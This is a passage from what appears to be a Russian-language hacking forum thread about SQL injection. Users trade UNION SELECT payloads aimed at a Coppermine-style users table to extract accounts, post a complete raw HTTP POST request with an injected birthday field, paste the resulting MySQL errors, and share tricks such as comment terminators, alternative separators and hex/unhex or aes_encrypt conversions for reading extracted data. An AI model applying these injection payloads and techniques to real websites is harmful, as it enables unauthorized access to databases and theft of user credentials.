-1+union+select+1,2,3,4,5,name_of_column,7+from+cpg 130_users+limit+1,1/* нерабоает!!!

GOGA075
Вместо name_of_column нужен твой, существующий столбец, Sharingan всё тебе написал.Но и с имеющимся столбцом может не работать , всё зависит от базы,прав доступа фильтрации и т.д.Всё в статьях на форуме

А как этот столбец найти??

Goga075
Смотря какая база , запросы и методы будут разными.Если дашь ссылку , то тебе его найдут , но как ты думаешь зачем люди пишут статьи, а другие люди их читают?
Если сейчас тебе дадут готовый запрос по выводу аккаунта,завтра ты опять в этой теме будешь писать те-же вопросы.

POST /index.php?action=esearch&lang=en HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 168
Cookie: PHPSESSID=065ad9c95bdbd658b23dc7305f91b803
Connection: Close
Pragma: no-cache

fname=111-222-1933email@address.tst&lname=111-222-1933email@address.tst&b_day=-1+union+select+1,2,3,4,5,6,7,8,9&b_month=none&b_ye ar=none&city=none&field=none&grupp=none


Почему при таком POST запросе выдаётся Unknown table 'g' in order clause ?. Я ж бля не выбираю таблицы вообще. ордер бай выдаёт ошибку,груп бай при 9 выдаёт боле менее)

При order by такая ошибка :



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY g.grupp_id, s.city, s.lname' at line 16

Де тут ошибка в синтаксисе ниипу вапще

При запросе -1+group+by+9 выдаёт нормальную страницу( знач кол-во столбцов подобрано правильно).

2велемир блин такой мастер ставить вопросы такой злой пост прям ппц не че не понятно O_o
по крайней мере из того что я тут понял в конец запроса добавь /* либо пробелы через
/../ или просто пробелы поставь !а в идела был бы url было бо проше

иногда приходится пользоваться hex unhex чтобы получить версию бд в скуле. какие есть еще варианты шифрования? или стоит всегда пользоваться hex?
знаю еще compress,uncompress,aes_cr

bag
Это не обход шифрования
hex:unhex используют при проблемах с кодировкой.
Для этих-же целей используют ещё aes_decrypt:aes_encrypt или cast(_строка_+as+binary)
Эти функции преобразуют строку в нужную кодировку.Например
aes_encrypt шифрует строку с заданным ключом, а aes_decrypt дешифрует, на выходе получается результат в "правильной" кодировке.То-же самое делает пара hex:unhex только другим алгоритмом

теперь все ясно, спасибо)))